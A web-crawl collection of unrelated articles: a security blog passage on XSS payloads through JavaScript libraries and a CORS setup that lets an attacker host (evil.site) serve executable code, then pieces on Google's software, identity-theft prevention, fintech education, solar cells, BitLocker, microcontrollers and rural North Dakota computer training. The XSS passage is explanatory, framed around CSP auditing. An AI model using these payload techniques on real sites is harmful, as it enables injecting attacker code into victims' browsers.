In Ember.js the payload might look like:
Ember.run(null, alert, 9)
The pervasive jQuery might have a string like:
And the Underscore library might be leveraged with:
These are nice tricks. They might seem to do little more than offer fancy ways of triggering an
alert() message, but the code is trivially modifiable to a more lethal version worthy of a vorpal blade.
The jQuery library provides a few ways to obtain code:
Prototype has an
Ajax object. It will load and execute code from a call like:
But this has a catch: the request includes “non-simple” headers via the XHR object and therefore triggers a CORS pre-flight check in modern browsers. An invalid pre-flight response will cause the attack to fail. Cross-Origin Resource Sharing is never a problem when you’re the one sharing the resource.
In the Prototype
Ajax example, a browser’s pre-flight might look like the following. The initiating request comes from a link we’ll call http://web.site/xss_vuln.page.
OPTIONS http://evil.site/ HTTP/1.1 Host: evil.site User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Origin: http://web.site Access-Control-Request-Method: POST Access-Control-Request-Headers: x-prototype-version,x-requested-with Connection: keep-alive Pragma: no-cache Cache-Control: no-cache Content-length: 0
As someone with influence over the content served by evil.site, it’s easy to let the browser know that this incoming cross-origin XHR request is perfectly fine. Hence, we craft some code to respond with the appropriate headers:
HTTP/1.1 200 OK Date: Tue, 27 Aug 2013 05:05:08 GMT Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26 Access-Control-Allow-Origin: http://web.site Access-Control-Allow-Methods: GET, POST Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with Access-Control-Expose-Headers: x-json Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8
With that out of the way, the browser continues its merry way to the cursed resource. We’ve done nothing to change the default behavior of the
Ajax object, so it produces a POST. (Changing the method to GET would not have avoided the CORS pre-flight because the request would have still included custom
Finally, our site responds with CORS headers intact and a payload to be executed. We’ll be even lazier and tell the browser to cache the CORS response so it’ll skip subsequent pre-flights for a while.
Okay. So, it’s another
alert() message. I suppose I’ve repeated myself enough on that topic for now.
Never the less, auditing and improving code for CSP is a worthwhile endeavor. Even 1st level thieves only have a 20% change to Find/Remove Traps. The chance doesn’t hit 50% until 7th level. Improvement takes time.
And the price for failure? Well, it turns out condign punishment has its own API. | <urn:uuid:5c71d3a7-caa7-46dd-94c1-abf46dd7df5d> | CC-MAIN-2017-09 | https://deadliestwebattacks.com/2013/08/27/dry-fiend-conjurationsummoning/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171775.73/warc/CC-MAIN-20170219104611-00321-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.820459 | 1,233 | 2.828125 | 3 |
Google relies on internally developed software.
Google primarily relies on its own internally developed software for data and network management and has a reputation for being skeptical of "not invented here" technologies, so relatively few vendors can claim it as a customer.
Google's primary programming languages include C/C++, java and python. Guido Van Rossum, Python's creator, went to work for google at the end of 2005. The company also has created sawzall, a special-purpose distributed computing job preparation language.
|Distributed file system
||Google File System
||Global Work Queue
|Very large database management systems
||Google proprietary, Sleepycat
|Server operating system
||Red Hat Linux (with kernel-level modifications by Google)
||Red Hat, Google|
Web protocol accelerator
||NetScaler Application Delivery
|Web content translation
Analyzers for Chinese, Japanese
and Korean (used
in combination with
|File conversion and content extraction
Google's Extreme Infrastructure
What Other CIOs Can Learn from Google
Why Parallel Processing Makes Sense
Behind The Google File System
How Google Reduces Complexity
Google's Secret Arsenal
Would Google's File System Work for You?
Inside Google's Enterprise
Also in this Feature:
The People Who Power Google
Google Courts the Enterprise
How Google Manages a Global Workforce | <urn:uuid:bb8068d9-290d-4b6f-836e-f86a0d780bac> | CC-MAIN-2017-09 | http://www.baselinemag.com/c/a/Projects-Networks-and-Storage/Base-Technologies-Internal-Development | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00441-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.739199 | 281 | 2.609375 | 3 |
Frequently Asked Questions
You may have heard of identity theft, but what does this term really mean? Going far beyond credit card fraud, identity theft is a rapidly growing crime that most people will face at some point in their lives. Identity theft is officially defined as the deliberate assumption of another person's identity. It is a crime where a criminal acquires and uses the victim's personal information, such as a Social Security or driver's license number, to take out loans, obtain new credit cards, rent an apartment, purchase a car, run up debt, file for bankruptcy and other criminal activities. Identity theft can not only damage someone's creditworthiness, it can also create unknown criminal records that can result in the identity theft victim being wrongly arrested or denied employment after a routine background check.
The term "financial fraud" covers common credit card, check, and debit card fraud. When a criminal uses your credit cards or debit cards to make a purchase, he or she usually hasn't assumed your identity. Recovering from financial fraud is usually easy, since most creditors don't hold you liable for fraudulent charges. These days, financial fraud is increasingly grouped into the same category as serious identity theft. The FTC combined both types in a report announcing that there were 9.9 million cases of identity theft in 2003. These crimes alone cost businesses $27.6 billion and cost consumers $5 billion directly in losses every year.
Identity thieves use a variety of methods to gain access to your personal information:
- Steal records from their employer, bribe an employee who has access to the records, con information out of employees, or hack into the organization's computers
- "Dumpster dive" through your trash at home or work to find bills and credit statements that contain personal information
- Fraudulently obtain credit reports by either posing as a perspective landlord or misusing an employer's authorized access to credit reports
- Steal credit and debit card account numbers by using a special information storage device in a practice known as "skimming"
- Steal wallets and purses containing identification and credit and bank cards
- Steal your mail or complete a change of address to redirect your mail so that they will receive your credit card statements or tax information
- Use camera phones to take a picture of your credit or personal information while you complete a retail transaction
- Steal personal information from your home
- Scam information from you by posing as a legitimate business person or government official
Identity theft is a serious problem affecting more people every day. That’s why learning how to prevent it is so important. Knowing how to prevent identity theft makes your identity more secure. The more people who know how to prevent identity theft, the less inclined others may be to commit the crime.
Preventing identity theft starts with managing your personal information carefully and sensibly. We recommend a few simple precautions to keep your personal information safe:
- Only carry essential documents with you. Not carrying extra credit cards, your Social Security card, birth certificate or passport with you outside the house can help you prevent identity theft.
- Keep new checks out of the mail. When ordering new checks, you can prevent identity theft by picking them up at the bank instead of having them sent to your home. This makes it harder for your checks to be stolen, altered and cashed by identity thieves.
- Be careful when giving out personal information over the phone. Identity thieves may call, posing as banks or government agencies. To prevent identity theft, do not give out personal information over the phone unless you initiated the call.
- Your trash is their treasure. To prevent identity theft, shred your receipts, credit card offers, bank statements, returned checks and any other sensitive information before throwing it away.
- Make sure others are keeping you safe. Ensure that your employer, landlord and anyone else with access to your personal data keeps your records safe.
- Stay on top of your credit. Make sure your credit reports are accurate and that you sign up for a credit monitoring service, which can alert you by email to changes in your credit report – a helpful way to prevent identity theft.
- Protect your Social Security number. To prevent identity theft, make sure your bank does not print your SSN on your personal checks.
- Follow your credit card billing cycles closely. Identity thieves can start by changing your billing address. Making sure you receive your credit card bill every month is an easy way to prevent identity theft.
- Keep a list of account numbers, expiration dates and telephone numbers filed away. If your wallet is stolen, being able to quickly alert your creditors is essential to prevent identity theft.
- Create passwords or PIN numbers out of a random mix of letters and numbers. Doing so makes it harder for identity thieves to discover these codes, and makes it easier for you to prevent identity theft.
Consistently monitor both your financial and public record information and look for:
- Unfamiliar criminal records, court records, address information or bankruptcies
- Unexplained charges or withdrawals
- Failing to receive bills or other mail. This may signal an address change by the identity thief
- Being served court papers or arrest warrants for actions you did not commit
- Receiving credit cards for which you did not apply
- Being denied credit for no apparent reason
- Receiving calls or letters from debt collectors or businesses about merchandise or services you did not buy
Although any of these indications could be a result of a simple clerical error, you should not assume that there's been a mistake and do nothing. Always follow up with the business or institution to find out.
Enter your Member ID number as it appears on your health insurance card.
IDStrong’s data comes from Internet forums and websites, web pages, IRC channels, refined PII search engine queries, Twitter feeds, P2P sources, hidden and anonymous web services, malware samples, botnets, and torrent sources.
Your first IDStrong report includes data from the previous 8 years. This means that IDStrong searches the prior 8 years of records it has collected for a match to the personal information you are monitoring.
Your IDStrong service tracks Internet activity for signs that the personal information you’ve asked us to monitor is being traded and/or sold online. This alert means that our surveillance technology has discovered information on the Internet that is a match to your monitored identity elements.
Even if only some of your personal information has been detected by IDStrong, it is recommended that you contact the appropriate institution to have your account information changed, or change your account information yourself if possible - like it would be with the password to your email account. It is safe to assume that if some of your information is compromised, all of it is. You may also want to review a copy of your credit report to ensure that all of the information that appears there is familiar to you.
This activity is illegal in the United States, but other countries do not necessarily have the same laws as related to cyber crime. United States regulatory agencies have no jurisdiction to prosecute fraudsters acting on websites and chat rooms located in other countries.
IDStrong dramatically reduces your risk of identity theft by letting you know sooner if your personal information is compromised, and in turn enabling prevention or quick resolution of an identity theft incident. In addition to IDStrong, you also have identity protection insurance and recovery services to help alleviate some of the financial burden of identity theft. | <urn:uuid:757d3864-2141-49b6-9b9c-8e8d891ea288> | CC-MAIN-2017-09 | https://www.idstrong.com/faq.php | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170914.10/warc/CC-MAIN-20170219104610-00141-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.939617 | 1,514 | 2.890625 | 3 |
Fintech Through Education
With technology permeating all industries, few of us would feel confident utilizing financial products or services that aren’t thoroughly tech-integrated, and yet the realm of fintech is still observed warily by many. Though fintech indeed incorporates many of the cutting-edge innovations which bring finance and technology together, sometimes in scenarios considered risky, or at the very least enigmatic, much of today’s fintech provides the backbone for our financial institutions and ensures we’re able to manage our business and personal finances both conveniently and securely. It’s difficult to imagine a world without internet banking, mobile banking, and even online payment systems such as PayPal, but even more innate to our current financial systems are technologies which prevent check fraud, make possible a cashless society, enable (wisely or not) the proliferation of credit cards and short term loans, and put investment opportunities directly into the hands of both small and large-scale investors. Perhaps some of the suspicions can be put down to a lack of education in the fintech environment, a condition the fintech and educational industries are working hard to rectify.
Though financial education programs are widely evident globally, many of them have retained much of their traditional compositions for decades with little thought to the technological advances impacting the industry. However, many prominent schools, colleges, and universities are moving towards curriculums with greater technological training, and finance courses are being revised to meet today’s standards. Some notable fintech courses can even be accessed online, including MIT’s Future Commerce program which deals with fintech trends, and Columbia FinTech opening up study in various fintech sectors such as digital investing, and entrepreneurship and innovation in financial services.
But such education isn’t available only for those utilizing distance learning programs; NYU Stern already offers a fintech specialization in their MBA curriculum, dealing with an extensive range of fintech from digital currencies, blockchains, and the financial services industry to risk management for fintech to robo-advisors and systematic trading. And outside of the US, the Scotland-based University of Strathclyde has just announced their own master’s program in fintech, the first such course in the UK, which will cover areas such as financial programming and analytics to improve financial security and transacting within the technological realm.
(Infographic source: PWC)
An ingenious, though little understood, financial technology, blockchain allows the distribution of digital information while securing it from replication. It was originally devised for Bitcoin, one of the most prolific digital currencies, but today its potential uses are far wider. Say authors Don and Alex Tapscott, Blockchain Revolution, “The blockchain is an incorruptible digital ledger of economic transactions that can be programmed to record not just financial transactions but virtually everything of value.” Such technology is quite obviously extremely valuable, but because it’s little understood it’s no wonder many of us shy away from the concept. Gladly, educational institutions are incorporating blockchain tuition into their programs, with one online university even named for the technology, Blockchain University, promising hands-on public and private training for startups and corporates alike and encouraging the development of blockchain advances. Online courses from FinTech School, Open University, and Brandeis University, to name a few, also cover aspects of blockchain, along with courses from institutions such as New York University, Duke University, and Canada’s McGill University.
Fintech education, however, is something available only to those participating in formal education; as with most technologies, those wishing to advance their understanding have a wealth of resources at their fingertips thanks to a global community of experts ready to share their own learnings and experiences. And so, whether striving for an expert grasp or merely angling for a stouter layman comprehension, there’s no longer any excuse for any of us to fear or shy away from fintech and its many potentials. It’s time we brushed up on this important technology, ensuring a safer and more beneficial financial landscape for us all.
By Jennifer Klostermann | <urn:uuid:ba669904-4faa-4c79-9e98-61365ffa498b> | CC-MAIN-2017-09 | https://cloudtweaks.com/2017/01/deciphering-fintech-education/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00493-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.943636 | 855 | 2.71875 | 3 |
Hoping to usher in an age of low-cost solar power, Harvard's Clean Energy Project in June plans to release a list of 20,000 organic compounds that could be used to make cheap, printable photovoltaic cells.
In a move that it hopes will help usher in an age of low-cost solar power, Harvard University's Clean Energy Project (CEP) in June plans to release a list of 20,000 organic compounds that could be used to make cheap, printable photovoltaic cells (PVC).
The list, which the CEP will make available to solar power developers, could lead to the development of very low-cost PVCs. Using the compounds, a PVC that covers 1 square meter would cost about the same as the paint needed to cover the same area, according to Harvard.
The CEP's data "will ultimately benefit mankind with cleaner energy solutions," said Alan Aspuru-Guzik, a Harvard associate professor of chemistry and chemical biology.
Today, the most popular PVCs are made of silicon and cost about $5 per wafer to produce. For a solar energy technology to be competitive, each wafer would need to cost about 50 cents, according to Aspuru-Guzik.
The compounds on the CEP's list could also improve the solar conversion rates of PVCs. Currently, the top solar conversion rate of silicon PVCs is about 12%, meaning that only 12% of the light that hits them is converted to energy.
The CEP uses IBM's World Community Grid -- which relies on the spare processing power of around 6,000 computers all over the world -- in its search for the best molecules for organic photovoltaics, as well as the best ways to assemble the molecules to build inexpensive solar cells.
Harvard has built data storage systems with a capacity of about 400TB to capture the results of the computations.
This version of this story was originally published in Computerworld's print edition. It was adapted from an article that appeared earlier on Computerworld.com.
Read more about data center in Computerworld's Data Center Topic Center.
This story, "Harvard aims to help developers make cheaper solar panels" was originally published by Computerworld. | <urn:uuid:0e1fc466-fc8b-4a03-a098-2c41185aee19> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2165990/servers/harvard-aims-to-help-developers-make-cheaper-solar-panels.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171807.25/warc/CC-MAIN-20170219104611-00017-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.9527 | 460 | 3.59375 | 4 |
Windows Security: Part 6
In my last blog posting I discussed the Encrypting File System (EFS) that is built into every Windows operating system since Windows 2000 and how EFS works. Although EFS is effective as a security control against data security breach-related risks, a major limitation is that it does not provide whole disk encryption, making it susceptible to certain kinds of attacks. A perpetrator who has local access to the same hard drive on which Windows resides can, for example, boot a non-Windows operating system to access EFS-encrypted files and directories or copy the entire encrypted contents of a lost or stolen PC’s hard drive to a completely different computer to view the information in clear text. Windows BitLocker encryption, which is available in Vista (see footnote below) and Windows Server 2008, addresses this limitation nicely by encrypting the entire contents of a Windows volume, thereby protecting all the data therein from a wider variety of attacks.
BitLocker’s functionality does not stop there, however. It works with version 2 of the Trusted Platform Module (TPM 1.2) to protect against the integrity of a Windows system from being compromised if that system has been offline by performing Integrity checks on initial boot components. Consequently, information decryption can occur only if: 1) critical system components have ostensibly not been tampered with, and 2) the encrypted drive has stayed within the original system. If BitLocker detects tampering with any system files or information, the system halts the startup process
Predictably, how BitLocker actually works is a little more complicated. If BitLocker is to function to its fullest potential, the
- System must have TPM version 1.2. System integrity checks can nevertheless be performed if this requirement is not met, but the Administrator must save a special startup key that must be stored on removable media, e.g, a flash drive.
- System with a TPM must also have a BIOS that is Trusted Computing Group (TCG)-compliant. The BIOS sets up a chain of trust during startup prior to the operating system boot process; it must support the TCG-specified Static Root of Trust Measurement. If a system does not have a TPM, a TCG-compliant BIOS is unnecessary.
- System BIOS must support the USB mass storage device class. This includes the ability to read small files stored on a USB flash drive before the operating system boots, regardless of whether the system does or does not have a TP.
- Hard disk must have a minimum of two partitions, with the system (boot) partition having both the operating system and files are needed to load the operating system after the BIOS has initialized the system hardware. BitLocker must not be enabled on this partition, nor can this partition be encrypted through any other means. .
- File system must be NTFS.
- System drive should have a minimum of 1.5 GB.
Like anything else, BitLocker is not perfect. One widely advertised attack against it is to launch a “Cold DRAM” attack in which the temperature of the hard drive is reduced to the freezing point. In reality, however, what this kind of attack shows is that if someone has physical access to a hard drive, that person can ultimately defeat any security control.
Although EFS is not bad, BitLocker is much better for several reasons. First, it keeps users out of the loop altogether. With BitLocker the decision to encrypt files is made by a system administrator, not any user. Second, BitLocker simplifies encryption and key management. There are no individual keys to store and manage. Furthermore, as stated earlier, whole disk encryption greatly reduces the risk that an unauthorized person will be able to decrypt the contents of a BitLocker-encrypted hard drive. And finally, BitLocker even protects EFS encryption keys.
Footnote – Vista BitLocker is actually available only on Vista Business Enterprise and Ultimate Editions of Vista. | <urn:uuid:c3599666-7f67-4eec-8353-721141d36c9b> | CC-MAIN-2017-09 | http://blog.emagined.com/2009/12/windows-security-part-6/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173872.97/warc/CC-MAIN-20170219104613-00369-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.920223 | 821 | 2.875 | 3 |
If you want a wearable Internet of Things, the electronics have to be as small and as energy efficient as possible. That's why a new microcontroller by Freescale Semiconductor is notable.
The company has produced the Kinetis KLO3 MCU, a 32-bit ARM system that is 15% smaller than its previous iteration but with a 10% power improvement.
This microcontroller from Freescale Semiconductor is smaller than the dimple on a golf ball. (Photo: Freescale Semiconductor)
Internet of Things is a buzzword for the trend toward network-connected sensors incorporated into devices that in the past were standalone appliances. These devices use sensors to capture things like temperatures in thermostats, pressure, accelerometers, gyroscopes and other types of MEMS sensors. A microcontroller unit gives intelligence and limited computational capability to these devices, but is not a general purpose processor. One of the roles of the microcontroller is to connect the data with more sophisticated computational power.
The Kinetis KLO3 runs a lightweight embedded operating system to connect the data to other devices, such as an app that uses a more general purpose processor.
Kathleen Jachimiak, product launch manager at Freescale, said the new microcontroller will "enable further miniaturization" in connected devices. This MCU is capable of having up to 32 KB of flash memory and 2 KB of RAM.
Consumers want devices that are light, small and smart. They also want to be able to store their information and send it to an application that's either on a phone or a PC, Jachimiak said.
This microcontroller, at 1.6 x 2.0 mm, is smaller than the dimple on a golf ball, and uses a relatively new process in its manufacturing, called wafer level chip scale packaging. The process involves building the integrated package while the die is still part of a wafer. It's a more efficient process and produces the smallest possible package, for a given die size.
This article, Shrinking microcontrollers means smaller wearable computers , was originally published at Computerworld.com.
Patrick Thibodeau covers cloud computing and enterprise applications, outsourcing, government IT policies, data centers and IT workforce issues for Computerworld. Follow Patrick on Twitter at @DCgov or subscribe to Patrick's RSS feed. His e-mail address is firstname.lastname@example.org.
Read more about personal technology in Computerworld's Personal Technology Topic Center.
This story, "Shrinking Microcontrollers, Means Smaller Wearable Computers" was originally published by Computerworld. | <urn:uuid:9fcd8cdf-92a3-4de0-92c1-4808a2b5ca1b> | CC-MAIN-2017-09 | http://www.cio.com/article/2378260/consumer-technology/shrinking-microcontrollers--means-smaller-wearable-computers.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173872.97/warc/CC-MAIN-20170219104613-00369-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.921979 | 549 | 2.703125 | 3 |
For some states, economic development is more than bringing jobs to a region to lower the unemployment rate: It's about saving small towns from extinction. North Dakota is one of those states, and economic-development officials hope to save as many rural towns as possible from dying a slow death.
For many of the state's rural residents, those small towns offer the only avenue to basic services, such as doctors, other health-care providers and even grocery stores.
"When people start leaving, there's no one to provide services," said Tara Holt, director of Women and Technology
, a unit of the Bismarck-based Center for Technology and Business.
She cited Rugby, N.D., as a prime example of this scenario.
"This is a community that sees that they would be faced with extinction if they didn't get out and create some new opportunities for the people who live in the community," Holt said. "In Rugby, the hospital has led the way. The administration has taken an old nurses' dorm and created a technology lab in that dorm."
Holt said the hospital has long had a problem in getting licensed practical nurses (LPNs), so hospital brass created a system to work with a community college to educate nursing students from smaller communities so they can become LPNs.
"The skill of a 12-hour class translates into so much more," Holt said. "Now, you've got a vibrant community. You've got a hospital that's going to have employees. They've taken this whole thing out into the community; this community runs seven different classes per week, with probably 12 people in each class. They've changed their mentality, and technology is the basis of so many thing that the community relies on to stay alive."
Starting at Square One
Holt has organized a series of technology training courses for residents of rural towns for the last two years, and the training classes have reached approximately 7,000 people.
"I traveled into rural areas and went into businesses, and one of the things that I saw was that a lot of them had computers," she said. "But, if you started talking to them about what they used them for, guess what -- they had computes, but they didn't use them. They had no one to ask."
Getting such training to a rural population is difficult, Holt said, given that many of the people who need the training live three or four hours from the nearest city. Another problem was actually convincing the people that technology can be beneficial.
"We needed to change the mentality of everyone in the rural areas because there was a fear of technology, instead of embracing and using [it] to make things better," she said. "They really had a tendency to either pooh-pooh it or to damn it, because they didn't know about it."
The center's community computer training classes offer rural residents four courses: the introductory course; the intermediate course; the "Power-Up with Projects" course; and a "Build the Future Web Design" course. Trainers work with all ages of people, from children all the way to senior citizens.
"We wrote our own curriculum," she said. "We boiled it down to the simplest elements - here's what you have to know to run a computer - and left out all the extra things you don't need to know. We printed our books in a 14-point font, which may be a small thing, but it's turned into such a friendly thing, especially for senior citizens when they're looking back and forth between a book and a screen."
Once the curriculum was developed, Holt and her staff had to look for a place to test the effectiveness of the training programs.
"We found a community, Hettinger, in southwestern North Dakota, down in a corner where they're just desperate for anything," she said. "I thought we'd have about 20 students, and we had about 250 in the first few months. The community has a population of 1,200."
The sheer demand forced Holt to rethink her strategy of how to best reach rural residents, so she devised a plan where her staff trained key people to be able to go out and train other people. Finding the right people to take on the role of trainer was critical to the success of the community training classes.
"Every community has a few people who have decent computer skills, but, beyond that, are also good communicators and are respected in their community," she said. "In a rural area, if your peers don't respect you and you're teaching a class, they won't come. Finding those people was key to what we're doing."
Maintaining the Momentum
The need to press on in training efforts across the state is imperative, said Orlin Hanson, Economic Development Director of the Renville County Job Development Authority.
"This whole northwestern part of North Dakota is in dire shape," Hanson said. "The two counties right to the West of me - Burke County and Divide County - lost 25 percent of their population over the last 10 years. A good share of that is young couples leaving. My county lost 17 percent over the same course of time."
The first step to economic vitality in rural areas is developing a skilled workforce, he said, and luring companies to the state depends on having such a workforce ready.
"We're trying to promote economic development, and the best way we're going to do that is with private enterprise -- somebody who has a chance to make a profit," he said. "Profit is the greatest motivating factor that mankind has ever come up with. That's what we're trying to do out here -- getting a trainable workforce so those people who see they can make a profit, they'll come in."
Hanson, who lost his ranch in 1996, started as the economic development director approximately two years ago.
"I told the board, 'If I take it, my first objective is getting everybody, and I mean everybody, on computers and the Internet,'" he said. "We started running computer classes that winter in three little towns, and we had 189 people take the introductory and intermediate computer courses."
Holt's group of instructors trained the instructors who ultimately taught the 189 people who took the classes.
"We might be rural, but we're not isolated anymore," Hanson said.
Shane Peterson, News Editor | <urn:uuid:320ec00a-1764-455d-9d67-aa82f6339d81> | CC-MAIN-2017-09 | http://www.govtech.com/magazines/gt/Tug-of-War.html?page=2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173872.97/warc/CC-MAIN-20170219104613-00369-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.983351 | 1,308 | 2.734375 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.